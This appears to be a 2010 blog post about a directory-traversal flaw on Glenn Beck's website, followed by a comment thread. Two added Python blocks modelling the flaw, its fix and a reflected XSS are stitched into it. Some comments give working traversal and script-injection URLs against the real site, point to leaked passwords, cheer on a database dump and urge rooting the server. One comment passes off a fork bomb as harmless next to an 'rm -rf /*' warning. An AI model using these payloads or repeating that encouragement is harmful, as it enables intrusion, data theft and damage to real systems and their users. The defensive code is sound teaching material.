
Glenn Beck's website gives him something to cry about

Rob Beschizza at 9:44 am Thu, Jul 29, 2010

Glenn Beck's website, it turns out, can be manipulated into doing strange and NSFW things by messing with the URL. An insecure PHP file-download utility on the site takes a filename straight from the query string, so a request can walk up out of the web root with a string of ../ segments (directory traversal) and read files that were never meant to be served: password files, and a user group named for Rush Limbaugh. [Thanks, Dean!] Update: the discussion thread is down. Here's the Google cache of it.
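The getfile.php pattern described above, as an added example (this is not code from glennbeck.com or from this post): a Python model of a download endpoint that trusts its filename parameter, next to a version that canonicalises the path and refuses anything that leaves the base directory, plus a small triage pass over constructed access-log URLs. BASE_DIR, the function names and SAMPLE_LOG are assumptions; the long payload copies the shape of the URL quoted in the comments below, including the trailing %00.

```python
"""Directory traversal in a file-download endpoint: the broken behaviour and a fix.

Added example; not code from glennbeck.com or from the post above. It models
the pattern the article describes: a script that reads a ``filename`` query
parameter and opens that path. BASE_DIR, the function names and SAMPLE_LOG are
assumptions constructed for illustration (the long payload copies the shape
quoted in the comment thread). Values are taken as the web server hands them to
the script, i.e. already percent-decoded once, as PHP's $_GET does.
"""
import posixpath
from pathlib import Path
from urllib.parse import parse_qs, urlsplit

BASE_DIR = "/var/www/media"   # assumed directory the endpoint is meant to serve from


class TraversalError(ValueError):
    """Raised when a requested filename would leave the base directory."""


def vulnerable_resolve(base_dir, name):
    """The 'before': join and trust.

    Older PHP passed the string to C's open(), which stops at the first NUL,
    so "../../etc/hosts\\0.jpg" survives a ".jpg" suffix check yet opens
    /etc/hosts; modelled here by cutting at the NUL. '..' segments then walk
    above base_dir, and an absolute name discards base_dir entirely.
    """
    name = name.split("\x00", 1)[0]
    return posixpath.normpath(posixpath.join(base_dir, name))


def resolve_safely(base_dir, name):
    """The 'after': return an absolute Path under base_dir or raise TraversalError.

    1. Reject NUL outright; no legitimate filename contains one.
    2. Canonicalise base and target (collapses '..', follows symlinks) and
       require the target to stay inside the base. Grepping for "../" is weaker:
       it misses absolute paths, alternate encodings and symlinked escapes.
    """
    if "\x00" in name:
        raise TraversalError("NUL byte in filename")
    base = Path(base_dir).resolve()
    target = (base / name).resolve()
    try:
        target.relative_to(base)
    except ValueError:
        raise TraversalError(f"{name!r} escapes {base_dir}") from None
    return target


def is_safe(base_dir, name):
    """True if resolve_safely() would serve the file, False if it refuses."""
    try:
        resolve_safely(base_dir, name)
    except TraversalError:
        return False
    return True


# Constructed access-log paths (not real glennbeck.com logs).
SAMPLE_LOG = [
    "/app/getfile.php?filename=logo.png",
    "/app/getfile.php?filename=" + "../" * 18 + "etc/hosts%00",
    "/app/getfile.php?filename=../../../../etc/passwd",
    "/app/getfile.php?filename=/etc/passwd",
]


def classify(url):
    """Triage one logged URL: traversal depth, NUL present, whether the old
    handler would have read outside BASE_DIR, and whether the fix blocks it."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    name = query.get("filename", [""])[0]          # parse_qs percent-decodes once
    served = vulnerable_resolve(BASE_DIR, name)
    return {
        "dotdot": sum(1 for seg in name.split("/") if seg == ".."),
        "null_byte": "\x00" in name,
        "escaped_base": not served.startswith(BASE_DIR + "/"),
        "blocked_now": not is_safe(BASE_DIR, name),
    }


def triage(urls):
    """Run classify() over a list of logged URLs."""
    return [classify(u) for u in urls]


if __name__ == "__main__":
    for url, row in zip(SAMPLE_LOG, triage(SAMPLE_LOG)):
        print(url[:60].ljust(60), row)
```

The check is on where the path ends up, not on whether it contains "..": a name like a/../b still resolves under BASE_DIR and is served, while an absolute path, an 18-deep ../ chain, or anything carrying a NUL is refused.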


  • caribou

    Also, the linked site can be manipulated into falling down, if you BoingBoing it and they can’t handle the traffic?

    Software error:

    Too many connections at Board/Mysql.pm line 31.

  • Anonymous

    http://webcache.googleusercontent.com/search?strip=1&q=cache:http%3A%2F%2Fgreen-oval.net%2Fcgi-board.pl%2Fg%2Fthread%2F12376999

    Google cache of board (currently down) with passwords. Get ‘em before the cache gets pulled by Google….

  • bardfinn

    Indeed. Rather than being dot dot slashed, the site is slashdotted.

  • dequeued

    Did anyone see the etc hosts file?

    Not saying I did, that would be illegal, of course.

    But my friend did.
    http://media.glennbeck.com/app/getfile.php?filename=../../../../../../../../../../../../../../../../../../etc/httpd/conf/hosts

    It seems to have an internal map of other Clear Channel hosts: http://glenbeck.pastebin.com/0G3F91hq

  • dequeued

    Oops, malformed URL, it’s actually
    http://media.glennbeck.com/app/getfile.php?filename=../../../../../../../../../../../../../../../../../../etc/hosts%00

    It’s funny that a simple logical error like directory traversal is still a problem, it’s been like what, 25 years?

    lulz

  • Anonymous

    Oh god! There is a 99% chance that you have root access to the website and 70% chance that you have root access to the server. This means that the online world now owns his website and server. Please somebody with balls and humor use it for something intelligent or dig through the server and find his private porn collection or something.

  • Tim

    Glenn Beck’s website can also give you something to cry about: the realization that people actually listen to him.

  • dequeued

    I wish boingboing had waited just a few more hours before publishing this, so that anonymous would have had time to work, they didn’t figure it out until about 1pm EST.

    I know for a fact that the mysql database was logged into and all of the tables dumped.

    As far as I know, nobody modified the content of the site, but I believe that Mr Beck’s mailing list will be up on a torrent soon.

  • romulusnr

    This is devious, malicious hacking. Glenn Beck will not lie idle in the face of terrorist hackers. He will call for stronger anti-hacking laws.

    He will call the cyber police, and consequences will never be the same.

  • Eris Siva

    Looks like nothing happened. Poor guy.
    Kind of deserved it had anything ACTUALLY happened.

    I was really rooting for them to get an email dump in Palinesque style.

  • OCNCTY

    @ romulusnr

    I’m sure they can back trace that kind of thing easily.

  • xCleverPoet

    Wow, that is epic. I love the huge Cybersecurity Carbonite ad on the site. “I trust Carbonite to protect my priceless computer files; you should too.”

    Oh and um:
    http://www.glennbeck.com/search/results.php?q=%22%3E%3Cscript+type%3D%22text/javascript%22%3E+alert%28%27xCleverPoet+is+awesome+!%27%29+%3C/script%3E&submit.x=0&submit.y=0

    • Ted8305

      Oh, haha.

      http://www.glennbeck.com/search/results.php?q=%22%3E%3Cscript+type%3D%22text/javascript%22%3E+alert%28%27You+done+goofed!\n+Prepare+to+be+back-traced.%27%29+%3C/script%3E&submit.x=0&submit.y=0

      • xCleverPoet

        Not exactly sure that modifying an existing URL is a crime. :-)
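The two search URLs above both start the q parameter with %22%3E, that is `">`, which only does anything if the page echoes the term inside a quoted attribute. The following is an added example, not code from glennbeck.com or from the commenters: a Python model of a results page that echoes q raw, next to one that escapes it, with a parser-based check for whether a script element gets created. The markup shape and PAYLOAD_URL are assumptions constructed to match the payload in the thread.

```python
"""Reflected XSS through a search-results page: raw vs escaped echo of ``q``.

Added example; not code from glennbeck.com or from the commenters. The markup
shape (the search term echoed into an input's value="..." and into a heading) is
an assumption that fits the payload above: it begins with %22%3E, i.e. '">',
to close a quoted attribute and its tag before opening <script>. PAYLOAD_URL is
constructed with the same shape as the URLs in the thread.
"""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

PAYLOAD_URL = (
    "/search/results.php?q=%22%3E%3Cscript+type%3D%22text/javascript%22%3E"
    "+alert%28%27xss%27%29+%3C/script%3E&submit.x=0&submit.y=0"
)


def q_from_url(url):
    """Extract the decoded search term, as $_GET['q'] would hold it."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_vulnerable(q):
    """The 'before': user input dropped straight into attribute and text contexts."""
    return f'<input type="text" name="q" value="{q}"><h2>Results for {q}</h2>'


def render_safe(q):
    """The 'after': html.escape(quote=True) maps & < > " ' to entities, so the
    browser renders the payload as literal text inside the attribute."""
    safe = html.escape(q, quote=True)
    return f'<input type="text" name="q" value="{safe}"><h2>Results for {safe}</h2>'


class _Tags(HTMLParser):
    """Collects the start tags the parser sees, in document order."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(markup):
    """Start tags a browser would create from the markup; a stand-in for
    'did a <script> element appear?' that needs no browser."""
    parser = _Tags()
    parser.feed(markup)
    parser.close()
    return parser.tags


if __name__ == "__main__":
    q = q_from_url(PAYLOAD_URL)
    print("decoded q  :", q)
    print("vulnerable :", tags_in(render_vulnerable(q)))
    print("escaped    :", tags_in(render_safe(q)))
```

Escaping at output time, in the context the value lands in, is what closes this; in the raw version the parser sees two script elements (one breaking out of the input, one inside the heading), in the escaped version only the input and the heading.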

  • rumpel

    So what may happen if someone actually downloaded a file from the server?

  • romulusnr

    BTW, the “user group named after Rush Limbaugh”: this is apparently the main server for Premiere Radio Networks, and it hosts not just Glenn Beck’s site but also Rush’s, Steve Harvey’s, Dr. Laura’s, and those of other Premiere Radio hosts. So the “user group named after Rush” is just the result of Red Hat’s “User Private Group” paradigm, which creates a group for every new user.

    PS I know this solely from what has been posted to greenoval. IANAL, TNO, TINC, IYKWIMAIKYD.

    • Anonymous

      Interesting! From that, I’m guessing that the “coast” user is for Coast to Coast AM, which is (sadly) another Premiere show…

  • ethancoop

    Someone explain this to me, I’ve got no clue what it means.

  • the_headless_rabbit

    When I follow the link, I get this:

    You done goofed!
    Prepare to be back-traced.

    WTF?

    Glenn, are your website warnings/threats as incoherent as your show? Wow!

    • the_headless_rabbit

      wait, wait, I get it now….never mind, I’m a little slow today….

      • Anonymous

        If anyone tells you to do a series of actions on your mac that ends with typing “rm -rf /*” and hitting enter, please don’t do it.

        You can do this though :(){ :|:& };: it won’t hurt… much…

  • bytefyre

    Someone should call in to the radio program and say, in a ridiculously exaggerated southern drawl, “so, I heard you folks use Red Hat, you know there are commies associated with Linux (pause) OH MY GOD JEB, OH. MY. GAWD. GLENN BECK IS A COMMIE!” It would be quite funny, I think.

  • SamSam

    So besides the silly alert-box hacking, it looks like they were able to get the DB username and password. But it doesn’t seem as if anyone has been adding or modifying files. But given that /b/ knows about this, that kind of self-restraint is simply not computable. So I’m guessing I’m missing something?

    • Griffin

      What does /b have to do with this? I mean, I assume they know by now, but I haven’t seen any indication that they have anything to do with it.